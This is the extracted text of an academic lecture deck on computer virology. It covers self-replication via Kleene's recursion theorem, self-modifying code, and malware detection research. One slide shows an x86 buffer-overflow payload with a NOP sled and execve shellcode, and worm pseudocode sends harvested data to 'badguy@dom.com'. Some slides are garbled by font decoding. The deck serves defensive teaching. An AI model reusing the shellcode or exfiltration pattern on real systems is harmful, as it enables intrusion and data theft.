An introduction to Computer Virology -...

Preview:

Citation preview

An introduction to Computer Virology

Jean-Yves MarionLORIAINPL - ENSMN

1mercredi 23 février 2011

Some great stories

• Stuxnet • A botnet Waledac

• GhostNet

2mercredi 23 février 2011

What is a malware ?

• A malware is a program which has malicious intentions

• A malware is a virus, a worm, a spyware, a botnet ...

• Giving a mathematical definition is difficult

• However formal definitions are necessary in order to make progress

3mercredi 23 février 2011

How do infections by malware work ?

Social engineering

Vulnerabilities

Infections

Infections

InfectionsInfections

Mutations

4mercredi 23 février 2011

Vulnerabilities : a buffer-overflow

void vulnerable(char *user_data) {   char buffer[4];   strcpy(buffer, userdata);}

buffer

EIP

EBP

...

...

...

Stack

vulenrable(«AAAAAAAAAAAAAAAA\xec\xf2\xff\xbf\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/ls»)

\x90\x90

\xE000

\x90\x90

\x90\x90

\xFFF0

5mercredi 23 février 2011

Vulnerabilities : a buffer-overflow

void vulnerable(char *user_data) {   char buffer[4];   strcpy(buffer, userdata);}

buffer

EIP

EBP

...

...

...

Stack

\x90\x90

\xE000

\x90\x90

\x90\x90

\xFFF0

return at the address FFF0

6mercredi 23 février 2011

Bugs

• Data are programs

• Bugs are doors if there are exploitable

• A no bug system is safe

0 days exploitBug free n’existe pas

• A buffer-overflow transform a program in a self-modifying program

7mercredi 23 février 2011

Protections: Self-Modification and Obfuscation

• A lot of malware families use home-made obfuscations, like packers to protect their binaries, following a standard model.

• The obfuscation mechanism is automatically modified for each new distributed binary.

!"#$%&'(#)($*+,

- .&( &/ 01.213# /104.4#5 65# "&0#7018#91:;#35 (& 93&(#:( ("#43 <4'134#5= /&..&24'> 15(1'8138 0&8#.?

!"# 6'91:;4'> :&8# 45 16(&01(4:1..@ 0&84/4#8 /&3#1:" '#2 845(34<6(#8 <4'13@A

B

C34>4'1.<4'13@

D'91:;4'>$:&8#

EF

CEF

!349&6)?$G#H#35#7#'>4'##34'>$&/$01.213#$91:;#35$/&3$86004#5$7 I##9J#: BK+K$

• For a human analyst, it is very hard to understand an obfuscated code

8mercredi 23 février 2011

Win32.Swizzor Packer!"#$%&'()*(+'#,-.(/0(1-0#"'2.3#-

445"36#,7*(8&9&":&;&-<3-&&"3-<(#0('2%=2"&(62>?&":(0#"(@,''3&:(; A&&6B&> )C4C(

9mercredi 23 février 2011

Protections: Self-Modification and Obfuscation

• A lot of malware families use home-made obfuscations, like packers to protect their binaries, following a standard model.

• The obfuscation mechanism is automatically modified for each new distributed binary.

!"#$%&'(#)($*+,

- .&( &/ 01.213# /104.4#5 65# "&0#7018#91:;#35 (& 93&(#:( ("#43 <4'134#5= /&..&24'> 15(1'8138 0&8#.?

!"# 6'91:;4'> :&8# 45 16(&01(4:1..@ 0&84/4#8 /&3#1:" '#2 845(34<6(#8 <4'13@A

B

C34>4'1.<4'13@

D'91:;4'>$:&8#

EF

CEF

!349&6)?$G#H#35#7#'>4'##34'>$&/$01.213#$91:;#35$/&3$86004#5$7 I##9J#: BK+K$

• For a human analyst, it is very hard to understand an obfuscated code because not all the code lines are meaningful and because x86 semantics is very tricky.

• One problem is the absence of high level abstraction to structure and understand obfuscated codes.

10mercredi 23 février 2011

What is a malware ?

• Infect systems by self-replication

• Mutation

• Protect itself

• Obfuscation

• Self-modification

• Detection

• Undecidable

Pourquoi tracer ? (1/3)

Definition : l’analyse binaire, c’est

• de l’analyse de programme

• ou le programme est inconnu

=⇒ on a juste un blob binaireRaisons :

• sauts indirects=⇒ flot de controle indecidable

• lectures/ecritures indirectes=⇒ flot de donnees indecidable

• code auto-modifiant=⇒ syntaxe indecidable

3 / 32

11mercredi 23 février 2011

Outline

• Self-replication

• Self-modification

• Detection

• Morphological detection

• Behavioral detection

• Botnet neutralization

12mercredi 23 février 2011

Foundation 1 : Self-Replication

13mercredi 23 février 2011

Self-replicating Cellular automaton

Von Neumann (1952), Burke

Codd, Langton

14mercredi 23 février 2011

Cohen’s formalization (1985)Recursion

theorems as afoundation of

computer virology

Viruses andworms

ILoveYou

State of the art

A more abstractapproach

Abst Virology

Weak recursionBlueprint Distributions

Strong recursionExternal polymorphism

Extendedrecursionfixed polymorphism

Explicit recursionInternal polymorphism

Reproduction throughvectors

Detection

Conclusion

Cohen’s Virus (1985)

� Consider Turing Machine M� and a Viral set V� When a TM M reads v ∈ V , M produces v � ∈ V� (M, V ) is a description of a virus

v1 v2 ... vn v’1 v’2 v’m...

15mercredi 23 février 2011

Self-Replication

• A virus has self-replicating capacity

• Reflexive property of programming language

• Fixed point combinators (functional programming languages)

• Pointer mechanism to program code $0 is shell script

• Program encoding (Ken Thompson «Reflections on trusting Trust», CACM84)

• ComputabilityRecursion theorem of Kleene (1938)

16mercredi 23 février 2011

A worm X scenario:

•Open an email attachment by social engineering

•X scans for informations

•X extracts a list of email address of targeted peoples

•X sends copy of itself by email

A compilation point of view

17mercredi 23 février 2011

WormX(v,out){ info := extract(out); send(«badguy»,info); @bk := findAddress(out); send(@bk,v); }

Worm X specification

How to compile Worm X ?

send informationfind email address

send worm X to @bk

extract information

18mercredi 23 février 2011

Semantics and fixed point equations

Recursion

theorems as a

foundation of

computer virology

Viruses and

worms

ILoveYou

State of the art

A more abstract

approach

Abst Virology

Weak recursion

Blueprint Distributions

Strong recursion

External polymorphism

Extended

recursion

fixed polymorphism

Explicit recursion

Internal polymorphism

Reproduction through

vectors

Detection

Conclusion

Semantics

�_� : Programs×D∗ → D∗

where a value of D∗ is a system environment.

From the above example

�send�(spider@man.com,�� Hello��, Out)

= cons(cons(spider@man.com,�� Hello��), Out)

Where Out is an output stream.

Semantics:

Recursiontheorems as afoundation of

computer virology

I Always Love You

Suppose that out is a system entry point,A specification of ILoveYou is:

love(v,out) {info := find(out); // find informationsout := send(cons(‘‘badguy@dom.com’’,nil),info);@bk := extract(out); //extract addressesout := send(@bk,v); //send virus to @bkreturn out;}

v should behave as ILoveYou if:

!W "(out) = !WormX"(W,out)

We have to solve a fixed point equation :

W is a worm satisfying the specification WormX

19mercredi 23 février 2011

Kleene’s recursion theorem

If p is a program, then there is a program e such that:

Recursiontheorems as afoundation of

computer virology

Kleene’s recursion theorem

A general solution to fixed point equations is given byTheorem (Kleene (1938))If p is a program, then there is a program e such that

!e"(x) = !p"(e, x)

A solution of IloveYou equation

!v"(out) = !love"(v,out)

Set v = e where p = Love.

Recursiontheorems as afoundation of

computer virology

I Always Love You

Suppose that out is a system entry point,A specification of ILoveYou is:

love(v,out) {info := find(out); // find informationsout := send(cons(‘‘badguy@dom.com’’,nil),info);@bk := extract(out); //extract addressesout := send(@bk,v); //send virus to @bkreturn out;}

v should behave as ILoveYou if:

!W "(out) = !WormX"(W,out)

Kleene fixed point is a solution of

Self-replicating malware compiler:

There is Comp such that for all worm spec:

Recursiontheorems as afoundation of

computer virology

Viruses andworms

ILoveYou

State of the art

A more abstractapproach

Abst Virology

Weak recursionBlueprint Distributions

Strong recursionExternal polymorphism

Extendedrecursionfixed polymorphism

Explicit recursionInternal polymorphismReproduction throughvectors

Detection

Conclusion

I Always Love YouSuppose that out is a system entry point,A specification of ILoveYou is:love(v,out) {info := find(out); // find informationsout := send(cons(‘‘badguy@dom.com’’,nil),info);@bk := extract(out); //extract addressesout := send(@bk,v); //send virus to @bkreturn out;}

v should behave as ILoveYou if:

!W "(out) = !WormX"(W,out)

!Comp"(Worm) =W!W"(out) = !Worm"(W,out)

20mercredi 23 février 2011

Self-replicating compilers with mutations

If p is a program, then there is a program e :

where Mutate is a code mutation procedure

Self-replicating compiler with mutations:

There is Comp such that for all worm and mutation procedure:

Recursiontheorems as afoundation of

computer virology

Viruses andworms

ILoveYou

State of the art

A more abstractapproach

Abst Virology

Weak recursionBlueprint Distributions

Strong recursionExternal polymorphism

Extendedrecursionfixed polymorphism

Explicit recursionInternal polymorphismReproduction throughvectors

Detection

Conclusion

Some historical facts

!e"(out) = !Worm"(Mutate(e),out)

! 1983 : the first official virus pn Vax-PDP 11! 1988 : The first worm which infects 6000 machines! 1990 :Dark Avenger mutation engine (Bulgaria)! 1995 : macro virus! 2000 : Worm “I Love You”! 2001 : Palm pilot virus! 2004: Cell phone viruses

Recursiontheorems as afoundation of

computer virology

Viruses andworms

ILoveYou

State of the art

A more abstractapproach

Abst Virology

Weak recursionBlueprint Distributions

Strong recursionExternal polymorphism

Extendedrecursionfixed polymorphism

Explicit recursionInternal polymorphismReproduction throughvectors

Detection

Conclusion

Some historical facts

!e"(out) = !Worm"(Mutate(e),out)

!Comp"(Worm) =W!W"(out) = !Worm"(Mutate(W),out)

! 1983 : the first official virus pn Vax-PDP 11! 1988 : The first worm which infects 6000 machines! 1990 :Dark Avenger mutation engine (Bulgaria)! 1995 : macro virus! 2000 : Worm “I Love You”! 2001 : Palm pilot virus! 2004: Cell phone viruses

21mercredi 23 février 2011

References

• PhD thesis of F. Cohen

• L. Adleman (1988) which coins the word «virus»

• Guillaume Bonfante, Matthieu Kaczmarek, Jean-Yves Marion: On Abstract Computer Virology from a Recursion Theoretic Perspective. Journal in Computer Virology (3-4): 45-54 (2006)

A Virus is a Virus, Lwoff

22mercredi 23 février 2011

Foundation 2 : Auto-modifications

23mercredi 23 février 2011

A simple self-modifications

n + 1n

A simple decryption loop

Wave 2

Wave 1

jnz @b

24mercredi 23 février 2011

Another example of self-modification

Proxy = { X:= Read();

eval(X);}An external input is run

An interpreter of a known or unknown language is used to execute some data

25mercredi 23 février 2011

Applications of self-modifying programs

• Malware mutations

• Code protection (digital rights)

• Compression and packers

• Just in Time compilers

26mercredi 23 février 2011

Analyzing self-modifying programs

• Complex to design and to analyze

• Program flow may change

• Usual in semantics program and data are separatedRecursion

theorems as afoundation of

computer virology

Viruses andworms

ILoveYou

State of the art

A more abstractapproach

Abst Virology

Weak recursionBlueprint Distributions

Strong recursionExternal polymorphism

Extendedrecursionfixed polymorphism

Explicit recursionInternal polymorphismReproduction throughvectors

Detection

Conclusion

Some historical facts

P ! ! " !!

!e"(out) = !Worm"(Mutate(e),out)

!Comp"(Worm) =W!W"(out) = !Worm"(Mutate(W),out)

! 1983 : the first official virus pn Vax-PDP 11! 1988 : The first worm which infects 6000 machines! 1990 :Dark Avenger mutation engine (Bulgaria)! 1995 : macro virus! 2000 : Worm “I Love You”! 2001 : Palm pilot virus! 2004: Cell phone viruses

Define by structural induction on P :

• Axiomatic semantic by means of Hoare logic and separation logic (Myreen and Cai-Appel & al)

27mercredi 23 février 2011

Dynamic analysis of self-modifying programs

• Instrument a program

• Monitor read R, write W memory access and memory execution X

• We follow nested self-modifying

• We detect some code protection

• We detect code patterns

• code decryption

• Integrity checking

• ....

28mercredi 23 février 2011

AC ProtectExemple (3/5)

• hostname packe avec ACProtect

29mercredi 23 février 2011

ThemidaExemple (4/5)

• hostname packe avec Themida

30mercredi 23 février 2011

Experiments with TraceSuferResultats experimentaux 1/3

• Nombre de vagues de code detectees sur l’ensemble des binaires◦ max : 56 vagues

24 / 32

Number of waves detected - max=56

95 613 Binaries, 80% of success, 1400 binaries/h

TraceSurfer based on Pin (Intel)

31mercredi 23 février 2011

Typing systems

• each memory cell m at step x has a level Exec(m,x), Read(m,x), Write(m,x)

• if we execute an instruction at address m:

Exec(m,x+1) = Write(m,x)+1

• if the instruction at address m reads memory address m’

Read(m’,x+1) = Exec(m,x)

• If the instruction at address m writes memory address m’

Write(m’,x+1)= Write(m,x)

32mercredi 23 février 2011

Related works

• TraceSufer based on PIN (INTEL)

• Bitblaze (Berkeley) : TEMU, VINE, ...

• DynamoRio, Ether, Metasm

33mercredi 23 février 2011

Malware detection

34mercredi 23 février 2011

Malware detection by traditional detection

• Signature is a regular expression denoting a sequence of bytes

Worm.YYour mac is now under our control !

• Signature : «Your * is now under our control»

• Signature are quasi-manually constructed

• Vulnerable to code mutations and code obfuscations

• Because based at low (machine code) abstraction level

Because based on low level abstraction at level code machine

35mercredi 23 février 2011

36mercredi 23 février 2011

Morphological analysis in a nutshell

Signatures are abstract flow graph

Detection of subgraph in program flow graph abstraction

37mercredi 23 février 2011

Automatic construction of signatures

38mercredi 23 février 2011

Reduction of signatures by graph rewriting

39mercredi 23 février 2011

Morphological detection : Results

• False negative

• No experiment on unknown malwares

• Signatures with < 18 nodes are potential false negative

• Restricted signatures of 20 nodes are efficient

• Less than 3 sec. for signatures of 500 nodes

40mercredi 23 février 2011

Conclusion about morphological detection

• Benchmarks are good

• Pro

• More robust on local mutation and obfuscation

• Detect easily variants of the same malware family

• Try to take into account program semantics

• Quasi-automatic generation of signatures

• Cons

• Difficult to determine flow graph statically of self-modifying programs

• Use of combination of static and dynamic analysis

41mercredi 23 février 2011

Reference

• Guillaume Bonfante, Matthieu Kaczmarek and Jean-Yves Marion, Architecture of a malware morphological detector, Journal in Computer Virology, Springer 2008.

42mercredi 23 février 2011

Behavioral analysis

• Monitor program interactions (sys calls, network calls, ...)

• Detection of program behavior from execution traces

• Functionalities are express at high level

Trace automata

Introduction

Trace abstraction• Behavior patterns• Abstracting byreduction• Trace automata• Regular abstraction

Malicious behaviordetection

Experiments

Conclusion

12 / 22

• Trace language of a program: generally undecidable.

• Approximation by a regular language: using trace collectionor static analysis.

=! A trace automaton is a finite state approximation of some tracelanguage.

GetLogicalDriveStrings

IcmpSendEcho GetDriveType FindNextFileFindFirstFile

GetDriveType FindFirstFile

FindFirstFile FindNextFile

FindNextFile

• Information leak can be detected

• Static and dynamic analysis

43mercredi 23 février 2011

Some works on behavioral analysis

• Martignoni and al, 2008, on multi-layered abstraction

• Jacob and al, 2009, on low-level functionalities but exponential-time detection

• Beaucamps, Gnaedig, Marion, RV 2010, on fast detection of high level functionalities.

44mercredi 23 février 2011

Botnets

• Understanding malware at the network level, with the interaction between thousands of infected hosts.

• Reverse-engineering

• Provide a start for understanding of a botnet (Protocole, objective...)

• Simulation and analytical modeling

• Large scale experiments in vitro

45mercredi 23 février 2011

Botnet neutralisation in the lab

!"!#$$#%&'(!

!

)!*+,-.*!

!/011!*2#33'(*!!

011!('2'#$'(*!

4!2(5$'%$5(*!

13!

WHITE C&C!

Attack scenario!

46mercredi 23 février 2011

Spam sent by the botnet

47mercredi 23 février 2011

Rlist infections for repeaters

48mercredi 23 février 2011

Conclusions

49mercredi 23 février 2011

Conclusion

• Mathematical definitions of malware with tools

• High level representation of binaries

• Abstract signature which are robust wrt obfuscations

• Experiments theories

• Analyzing tools combining static and dynamic analysis

• Detection and neutralization heuristics

50mercredi 23 février 2011

High Security Lab @ Nancy

lhs.loria.fr

Telescope & honeypotsIn vitro experiment clusters

51mercredi 23 février 2011

Thanks !

52mercredi 23 février 2011